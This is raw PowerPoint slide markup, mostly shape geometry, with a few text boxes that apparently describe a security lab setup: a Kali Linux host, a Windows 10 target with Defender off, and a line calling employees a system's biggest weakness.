                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="698925" y="341697"/>
                    <a:pt x="685594" y="435633"/>
                    <a:pt x="696108" y="530807"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="710057" y="656766"/>
                    <a:pt x="767780" y="762660"/>
                    <a:pt x="845843" y="859345"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="857250" y="873501"/>
                    <a:pt x="868108" y="888000"/>
                    <a:pt x="879240" y="90236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743E57-F2EB-4E40-8F66-279F4AFAAAED}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7096635" y="1042099"/>
              <a:ext cx="666037" cy="694210"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 156153 w 666037"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 694210"/>
                <a:gd name="connsiteX1" fmla="*/ 396802 w 666037"/>
                <a:gd name="connsiteY1" fmla="*/ 204709 h 694210"/>
                <a:gd name="connsiteX2" fmla="*/ 505307 w 666037"/>
                <a:gd name="connsiteY2" fmla="*/ 213093 h 694210"/>
                <a:gd name="connsiteX3" fmla="*/ 578491 w 666037"/>
                <a:gd name="connsiteY3" fmla="*/ 176466 h 694210"/>
                <a:gd name="connsiteX4" fmla="*/ 609345 w 666037"/>
                <a:gd name="connsiteY4" fmla="*/ 189454 h 694210"/>
                <a:gd name="connsiteX5" fmla="*/ 666037 w 666037"/>
                <a:gd name="connsiteY5" fmla="*/ 414435 h 694210"/>
                <a:gd name="connsiteX6" fmla="*/ 143441 w 666037"/>
                <a:gd name="connsiteY6" fmla="*/ 676661 h 694210"/>
                <a:gd name="connsiteX7" fmla="*/ 104272 w 666037"/>
                <a:gd name="connsiteY7" fmla="*/ 689717 h 694210"/>
                <a:gd name="connsiteX8" fmla="*/ 14321 w 666037"/>
                <a:gd name="connsiteY8" fmla="*/ 363996 h 694210"/>
                <a:gd name="connsiteX9" fmla="*/ 78022 w 666037"/>
                <a:gd name="connsiteY9" fmla="*/ 186774 h 694210"/>
                <a:gd name="connsiteX10" fmla="*/ 156153 w 666037"/>
                <a:gd name="connsiteY10" fmla="*/ 0 h 6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037" h="694210">
                  <a:moveTo>
                    <a:pt x="156153" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="217106" y="90982"/>
                    <a:pt x="309256" y="144856"/>
                    <a:pt x="396802" y="204709"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="433291" y="229654"/>
                    <a:pt x="467444" y="231715"/>
                    <a:pt x="505307" y="213093"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="529770" y="201067"/>
                    <a:pt x="555265" y="190554"/>
                    <a:pt x="578491" y="176466"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="597525" y="164991"/>
                    <a:pt x="604054" y="166915"/>
                    <a:pt x="609345" y="189454"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="627005" y="264700"/>
                    <a:pt x="646933" y="339464"/>
                    <a:pt x="666037" y="414435"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="455349" y="429140"/>
                    <a:pt x="290015" y="534347"/>
                    <a:pt x="143441" y="676661"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="132308" y="687518"/>
                    <a:pt x="122757" y="701536"/>
                    <a:pt x="104272" y="689717"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="-8425" y="617495"/>
                    <a:pt x="-13854" y="482328"/>
                    <a:pt x="14321" y="363996"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28889" y="302769"/>
                    <a:pt x="52252" y="244016"/>
                    <a:pt x="78022" y="186774"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="92246" y="155301"/>
                    <a:pt x="172302" y="24120"/>
                    <a:pt x="156153" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:schemeClr val="accent4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AF252CA-F293-4771-94BA-831C55E9828E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5429303" y="3827148"/>
              <a:ext cx="1180497" cy="1087684"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 1180497"/>
                <a:gd name="connsiteY0" fmla="*/ 1060722 h 1087684"/>
                <a:gd name="connsiteX1" fmla="*/ 453466 w 1180497"/>
                <a:gd name="connsiteY1" fmla="*/ 621343 h 1087684"/>
                <a:gd name="connsiteX2" fmla="*/ 671782 w 1180497"/>
                <a:gd name="connsiteY2" fmla="*/ 488237 h 1087684"/>
                <a:gd name="connsiteX3" fmla="*/ 731910 w 1180497"/>
                <a:gd name="connsiteY3" fmla="*/ 450374 h 1087684"/>
                <a:gd name="connsiteX4" fmla="*/ 1059485 w 1180497"/>
                <a:gd name="connsiteY4" fmla="*/ 129395 h 1087684"/>
                <a:gd name="connsiteX5" fmla="*/ 1180497 w 1180497"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 1087684"/>
                <a:gd name="connsiteX6" fmla="*/ 1081544 w 1180497"/>
                <a:gd name="connsiteY6" fmla="*/ 282841 h 1087684"/>
                <a:gd name="connsiteX7" fmla="*/ 965343 w 1180497"/>
                <a:gd name="connsiteY7" fmla="*/ 563689 h 1087684"/>
                <a:gd name="connsiteX8" fmla="*/ 889960 w 1180497"/>
                <a:gd name="connsiteY8" fmla="*/ 652884 h 1087684"/>
                <a:gd name="connsiteX9" fmla="*/ 844194 w 1180497"/>
                <a:gd name="connsiteY9" fmla="*/ 705728 h 1087684"/>
                <a:gd name="connsiteX10" fmla="*/ 812652 w 1180497"/>
                <a:gd name="connsiteY10" fmla="*/ 758572 h 1087684"/>
                <a:gd name="connsiteX11" fmla="*/ 509196 w 1180497"/>
                <a:gd name="connsiteY11" fmla="*/ 1028288 h 1087684"/>
                <a:gd name="connsiteX12" fmla="*/ 484389 w 1180497"/>
                <a:gd name="connsiteY12" fmla="*/ 1033442 h 1087684"/>
                <a:gd name="connsiteX13" fmla="*/ 488856 w 1180497"/>
                <a:gd name="connsiteY13" fmla="*/ 1005748 h 1087684"/>
                <a:gd name="connsiteX14" fmla="*/ 568981 w 1180497"/>
                <a:gd name="connsiteY14" fmla="*/ 882538 h 1087684"/>
                <a:gd name="connsiteX15" fmla="*/ 589046 w 1180497"/>
                <a:gd name="connsiteY15" fmla="*/ 848454 h 1087684"/>
                <a:gd name="connsiteX16" fmla="*/ 381176 w 1180497"/>
                <a:gd name="connsiteY16" fmla="*/ 990768 h 1087684"/>
                <a:gd name="connsiteX17" fmla="*/ 236800 w 1180497"/>
                <a:gd name="connsiteY17" fmla="*/ 1072542 h 1087684"/>
                <a:gd name="connsiteX18" fmla="*/ 202992 w 1180497"/>
                <a:gd name="connsiteY18" fmla="*/ 1076734 h 1087684"/>
                <a:gd name="connsiteX19" fmla="*/ 44735 w 1180497"/>
                <a:gd name="connsiteY19" fmla="*/ 1076321 h 1087684"/>
                <a:gd name="connsiteX20" fmla="*/ 0 w 1180497"/>
                <a:gd name="connsiteY20" fmla="*/ 1060722 h 108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0497" h="1087684">
                  <a:moveTo>
                    <a:pt x="0" y="1060722"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="148086" y="911056"/>
                    <a:pt x="292118" y="757129"/>
                    <a:pt x="453466" y="621343"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="518885" y="566300"/>
                    <a:pt x="594818" y="525551"/>
                    <a:pt x="671782" y="488237"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="693634" y="477655"/>
                    <a:pt x="714112" y="466523"/>
                    <a:pt x="731910" y="450374"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="845156" y="347504"/>
                    <a:pt x="952836" y="238999"/>
                    <a:pt x="1059485" y="129395"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1100648" y="87065"/>
                    <a:pt x="1140228" y="43154"/>
                    <a:pt x="1180497" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1154797" y="96823"/>
                    <a:pt x="1116796" y="189454"/>
                    <a:pt x="1081544" y="282841"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1044368" y="381451"/>
                    <a:pt x="1005474" y="466110"/>
                    <a:pt x="965343" y="563689"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="949813" y="601415"/>
                    <a:pt x="924731" y="615502"/>
                    <a:pt x="889960" y="652884"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="869276" y="671301"/>
                    <a:pt x="860136" y="684632"/>
                    <a:pt x="844194" y="705728"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="839452" y="710332"/>
                    <a:pt x="826671" y="737682"/>
                    <a:pt x="812652" y="758572"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="729023" y="883294"/>
                    <a:pt x="637904" y="957715"/>
                    <a:pt x="509196" y="1028288"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="501363" y="1032617"/>
                    <a:pt x="491880" y="1040382"/>
                    <a:pt x="484389" y="1033442"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="474769" y="1024577"/>
                    <a:pt x="484527" y="1014201"/>
                    <a:pt x="488856" y="1005748"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="511327" y="961975"/>
                    <a:pt x="540875" y="922669"/>
                    <a:pt x="568981" y="882538"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="576471" y="871818"/>
                    <a:pt x="583686" y="860961"/>
                    <a:pt x="589046" y="848454"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="515106" y="889891"/>
                    <a:pt x="449412" y="942116"/>
                    <a:pt x="381176" y="990768"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="336028" y="1022996"/>
                    <a:pt x="295004" y="1063128"/>
                    <a:pt x="236800" y="1072542"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="225599" y="1074329"/>
                    <a:pt x="214261" y="1075359"/>
                    <a:pt x="202992" y="1076734"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="120805" y="1097418"/>
                    <a:pt x="108849" y="1083811"/>
                    <a:pt x="44735" y="1076321"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27212" y="1078314"/>
                    <a:pt x="14568" y="1066838"/>
                    <a:pt x="0" y="106072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55C8DB-20D8-4032-B57B-99DDE3E7C8DD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4048670" y="2151346"/>
              <a:ext cx="944710" cy="981482"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 168 w 944710"/>
                <a:gd name="connsiteY0" fmla="*/ 581614 h 981482"/>
                <a:gd name="connsiteX1" fmla="*/ 8964 w 944710"/>
                <a:gd name="connsiteY1" fmla="*/ 552616 h 981482"/>
                <a:gd name="connsiteX2" fmla="*/ 109910 w 944710"/>
                <a:gd name="connsiteY2" fmla="*/ 378211 h 981482"/>
                <a:gd name="connsiteX3" fmla="*/ 174023 w 944710"/>
                <a:gd name="connsiteY3" fmla="*/ 367903 h 981482"/>
                <a:gd name="connsiteX4" fmla="*/ 371792 w 944710"/>
                <a:gd name="connsiteY4" fmla="*/ 525335 h 981482"/>
                <a:gd name="connsiteX5" fmla="*/ 431714 w 944710"/>
                <a:gd name="connsiteY5" fmla="*/ 516608 h 981482"/>
                <a:gd name="connsiteX6" fmla="*/ 571760 w 944710"/>
                <a:gd name="connsiteY6" fmla="*/ 270325 h 981482"/>
                <a:gd name="connsiteX7" fmla="*/ 708714 w 944710"/>
                <a:gd name="connsiteY7" fmla="*/ 25690 h 981482"/>
                <a:gd name="connsiteX8" fmla="*/ 767948 w 944710"/>
                <a:gd name="connsiteY8" fmla="*/ 14489 h 981482"/>
                <a:gd name="connsiteX9" fmla="*/ 923180 w 944710"/>
                <a:gd name="connsiteY9" fmla="*/ 142922 h 981482"/>
                <a:gd name="connsiteX10" fmla="*/ 934519 w 944710"/>
                <a:gd name="connsiteY10" fmla="*/ 215007 h 981482"/>
                <a:gd name="connsiteX11" fmla="*/ 525169 w 944710"/>
                <a:gd name="connsiteY11" fmla="*/ 952345 h 981482"/>
                <a:gd name="connsiteX12" fmla="*/ 460025 w 944710"/>
                <a:gd name="connsiteY12" fmla="*/ 966295 h 981482"/>
                <a:gd name="connsiteX13" fmla="*/ 143925 w 944710"/>
                <a:gd name="connsiteY13" fmla="*/ 716095 h 981482"/>
                <a:gd name="connsiteX14" fmla="*/ 25937 w 944710"/>
                <a:gd name="connsiteY14" fmla="*/ 623051 h 981482"/>
                <a:gd name="connsiteX15" fmla="*/ 168 w 944710"/>
                <a:gd name="connsiteY15" fmla="*/ 581614 h 9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44710" h="981482">
                  <a:moveTo>
                    <a:pt x="168" y="581614"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="-863" y="570757"/>
                    <a:pt x="3741" y="561549"/>
                    <a:pt x="8964" y="552616"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="42567" y="494481"/>
                    <a:pt x="76101" y="436277"/>
                    <a:pt x="109910" y="378211"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="129563" y="344539"/>
                    <a:pt x="142482" y="342753"/>
                    <a:pt x="174023" y="367903"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="239923" y="420403"/>
                    <a:pt x="306167" y="472491"/>
                    <a:pt x="371792" y="525335"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="399004" y="547256"/>
                    <a:pt x="414534" y="546362"/>
                    <a:pt x="431714" y="516608"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="478922" y="434834"/>
                    <a:pt x="525444" y="352579"/>
                    <a:pt x="571760" y="270325"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="617594" y="188894"/>
                    <a:pt x="662673" y="106983"/>
                    <a:pt x="708714" y="25690"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="726030" y="-4820"/>
                    <a:pt x="740530" y="-7638"/>
                    <a:pt x="767948" y="14489"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="820173" y="56751"/>
                    <a:pt x="871505" y="99974"/>
                    <a:pt x="923180" y="142922"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="948057" y="163606"/>
                    <a:pt x="950736" y="185871"/>
                    <a:pt x="934519" y="215007"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="797496" y="460466"/>
                    <a:pt x="661505" y="706543"/>
                    <a:pt x="525169" y="952345"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="506615" y="985742"/>
                    <a:pt x="490948" y="990483"/>
                    <a:pt x="460025" y="966295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="354131" y="883628"/>
                    <a:pt x="249200" y="799586"/>
                    <a:pt x="143925" y="716095"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="104687" y="684966"/>
                    <a:pt x="65381" y="653905"/>
                    <a:pt x="25937" y="623051"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12125" y="612263"/>
                    <a:pt x="-1687" y="601817"/>
                    <a:pt x="168" y="581614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F5CF0F-D322-43CD-B7F3-8AC33952E440}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="795521" y="2875723"/>
            <a:ext cx="4305372" cy="2498891"/>
            <a:chOff x="1879450" y="2899140"/>
            <a:chExt cx="3733697" cy="209896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ED302-70CC-4438-AD9D-1DF6FF3E90E7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1880404" y="2899140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cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Host System Information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989846-3A04-48C2-AD47-18FB1D88315D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1879450" y="3715434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cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Target System Information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546ADF-DEF4-44C0-88B4-C302E1D6C1B3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2541024" y="3303405"/>
              <a:ext cx="2926441" cy="284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OS: Kali Linux 2023.4, kernel 6.5.0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EA65E0-E227-49DA-9D05-77BE99BCB7DF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2671921" y="4093288"/>
              <a:ext cx="2926441" cy="904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OS: Windows 10 Home, x64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Browsers: Microsoft Edge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Defender status: OFF (Windows Defender, Edge SmartScreen)</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0">
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Round Same Side Corner Rectangle 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06CA8238-1FD1-47C4-B176-02B33BE6CA2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="9900000">
            <a:off x="1051175" y="4595970"/>
            <a:ext cx="448874" cy="3812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EF0F8032-69DE-4E08-9D23-50418AFE0207}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="970797" y="3291333"/>
            <a:ext cx="433221" cy="43683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331B3-FDA0-4EB7-B756-7962117B5F07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="796621" y="1321017"/>
            <a:ext cx="5610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cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The target is just an employee, and the biggest weakness of a system is simply…human.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" b="1" dirty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C0DADC-CEA0-45C4-8DB3-CD1BDB15E17B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5756367" y="1850105"/>
            <a:ext cx="6435634" cy="5007895"/>
            <a:chOff x="7001691" y="2819156"/>
            <a:chExt cx="5190309" cy="403884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304A7FB-BB1E-4D0B-9AE5-A6F4169FD0EA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7001691" y="4693236"/>
              <a:ext cx="2928242" cy="1946599"/>
              <a:chOff x="6917382" y="4652701"/>
              <a:chExt cx="2983072" cy="1983048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7BD4B61-270A-40EF-B2A3-79E1D4EF93E7}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6917382" y="4652701"/>
                <a:ext cx="2983072" cy="1983048"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 2977241 w 2983072"/>
                  <a:gd name="connsiteY0" fmla="*/ 1404120 h 1983048"/>
                  <a:gd name="connsiteX1" fmla="*/ 1664038 w 2983072"/>
                  <a:gd name="connsiteY1" fmla="*/ 1312116 h 1983048"/>
                  <a:gd name="connsiteX2" fmla="*/ 1634323 w 2983072"/>
                  <a:gd name="connsiteY2" fmla="*/ 1288114 h 1983048"/>
                  <a:gd name="connsiteX3" fmla="*/ 1230305 w 2983072"/>
                  <a:gd name="connsiteY3" fmla="*/ 69774 h 1983048"/>
                  <a:gd name="connsiteX4" fmla="*/ 1130872 w 2983072"/>
                  <a:gd name="connsiteY4" fmla="*/ 56 h 1983048"/>
                  <a:gd name="connsiteX5" fmla="*/ 68538 w 2983072"/>
                  <a:gd name="connsiteY5" fmla="*/ 15486 h 1983048"/>
                  <a:gd name="connsiteX6" fmla="*/ 1678 w 2983072"/>
                  <a:gd name="connsiteY6" fmla="*/ 98918 h 1983048"/>
                  <a:gd name="connsiteX7" fmla="*/ 437126 w 2983072"/>
                  <a:gd name="connsiteY7" fmla="*/ 1469265 h 1983048"/>
                  <a:gd name="connsiteX8" fmla="*/ 531416 w 2983072"/>
                  <a:gd name="connsiteY8" fmla="*/ 1703562 h 1983048"/>
                  <a:gd name="connsiteX9" fmla="*/ 478271 w 2983072"/>
                  <a:gd name="connsiteY9" fmla="*/ 1825853 h 1983048"/>
                  <a:gd name="connsiteX10" fmla="*/ 554274 w 2983072"/>
                  <a:gd name="connsiteY10" fmla="*/ 1888141 h 1983048"/>
                  <a:gd name="connsiteX11" fmla="*/ 2109201 w 2983072"/>
                  <a:gd name="connsiteY11" fmla="*/ 1983003 h 1983048"/>
                  <a:gd name="connsiteX12" fmla="*/ 2322354 w 2983072"/>
                  <a:gd name="connsiteY12" fmla="*/ 1912714 h 1983048"/>
                  <a:gd name="connsiteX13" fmla="*/ 2959525 w 2983072"/>
                  <a:gd name="connsiteY13" fmla="*/ 1470408 h 1983048"/>
                  <a:gd name="connsiteX14" fmla="*/ 2977241 w 2983072"/>
                  <a:gd name="connsiteY14" fmla="*/ 1404120 h 1983048"/>
                  <a:gd name="connsiteX15" fmla="*/ 2977241 w 2983072"/>
                  <a:gd name="connsiteY15" fmla="*/ 1404120 h 198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3072" h="1983048">
                    <a:moveTo>
                      <a:pt x="2977241" y="1404120"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2934953" y="1378976"/>
                      <a:pt x="1826903" y="1330402"/>
                      <a:pt x="1664038" y="1312116"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1645752" y="1310401"/>
                      <a:pt x="1638895" y="1303544"/>
                      <a:pt x="1634323" y="1288114"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1595464" y="1168680"/>
                      <a:pt x="1325737" y="356644"/>
                      <a:pt x="1230305" y="69774"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1212018" y="14914"/>
                      <a:pt x="1189160" y="-1087"/>
                      <a:pt x="1130872" y="56"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1060011" y="1199"/>
                      <a:pt x="140541" y="14914"/>
                      <a:pt x="68538" y="15486"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17678" y="16057"/>
                      <a:pt x="-6894" y="48059"/>
                      <a:pt x="1678" y="98918"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6249" y="125776"/>
                      <a:pt x="422840" y="1433835"/>
                      <a:pt x="437126" y="1469265"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="467413" y="1548126"/>
                      <a:pt x="471413" y="1637273"/>
                      <a:pt x="531416" y="1703562"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="458270" y="1744707"/>
                      <a:pt x="455413" y="1751564"/>
                      <a:pt x="478271" y="1825853"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="489700" y="1863569"/>
                      <a:pt x="514272" y="1885284"/>
                      <a:pt x="554274" y="1888141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="729711" y="1900713"/>
                      <a:pt x="1952051" y="1985289"/>
                      <a:pt x="2109201" y="1983003"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2188062" y="1981288"/>
                      <a:pt x="2226350" y="1983574"/>
                      <a:pt x="2322354" y="1912714"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2388643" y="1865283"/>
                      <a:pt x="2905809" y="1512125"/>
                      <a:pt x="2959525" y="1470408"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2984670" y="1449836"/>
                      <a:pt x="2988098" y="1430978"/>
                      <a:pt x="2977241" y="1404120"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2977241" y="1404120"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="484848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181C6B2-8AB6-4ABC-8470-D196305561C9}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7049409" y="4778370"/>
                <a:ext cx="1445617" cy="1416648"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 1442293 w 1445617"/>
                  <a:gd name="connsiteY0" fmla="*/ 1036725 h 1416648"/>
                  <a:gd name="connsiteX1" fmla="*/ 1349718 w 1445617"/>
                  <a:gd name="connsiteY1" fmla="*/ 770427 h 1416648"/>
                  <a:gd name="connsiteX2" fmla="*/ 1094277 w 1445617"/>
                  <a:gd name="connsiteY2" fmla="*/ 25251 h 1416648"/>
                  <a:gd name="connsiteX3" fmla="*/ 1059419 w 1445617"/>
                  <a:gd name="connsiteY3" fmla="*/ 107 h 1416648"/>
                  <a:gd name="connsiteX4" fmla="*/ 62802 w 1445617"/>
                  <a:gd name="connsiteY4" fmla="*/ 41251 h 1416648"/>
                  <a:gd name="connsiteX5" fmla="*/ 13086 w 1445617"/>
                  <a:gd name="connsiteY5" fmla="*/ 109255 h 1416648"/>
                  <a:gd name="connsiteX6" fmla="*/ 166807 w 1445617"/>
                  <a:gd name="connsiteY6" fmla="*/ 575561 h 1416648"/>
                  <a:gd name="connsiteX7" fmla="*/ 430247 w 1445617"/>
                  <a:gd name="connsiteY7" fmla="*/ 1385312 h 1416648"/>
                  <a:gd name="connsiteX8" fmla="*/ 478250 w 1445617"/>
                  <a:gd name="connsiteY8" fmla="*/ 1408742 h 1416648"/>
                  <a:gd name="connsiteX9" fmla="*/ 1106278 w 1445617"/>
                  <a:gd name="connsiteY9" fmla="*/ 1184160 h 1416648"/>
                  <a:gd name="connsiteX10" fmla="*/ 1245141 w 1445617"/>
                  <a:gd name="connsiteY10" fmla="*/ 1132729 h 1416648"/>
                  <a:gd name="connsiteX11" fmla="*/ 1245141 w 1445617"/>
                  <a:gd name="connsiteY11" fmla="*/ 1132729 h 1416648"/>
                  <a:gd name="connsiteX12" fmla="*/ 1245141 w 1445617"/>
                  <a:gd name="connsiteY12" fmla="*/ 1132729 h 1416648"/>
                  <a:gd name="connsiteX13" fmla="*/ 1424007 w 1445617"/>
                  <a:gd name="connsiteY13" fmla="*/ 1071012 h 1416648"/>
                  <a:gd name="connsiteX14" fmla="*/ 1442293 w 1445617"/>
                  <a:gd name="connsiteY14" fmla="*/ 1036725 h 1416648"/>
                  <a:gd name="connsiteX15" fmla="*/ 1442293 w 1445617"/>
                  <a:gd name="connsiteY15" fmla="*/ 1036725 h 141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5617" h="1416648">
                    <a:moveTo>
                      <a:pt x="1442293" y="1036725"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="1410292" y="948150"/>
                      <a:pt x="1380005" y="859003"/>
                      <a:pt x="1349718" y="770427"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1263999" y="521845"/>
                      <a:pt x="1178853" y="273833"/>
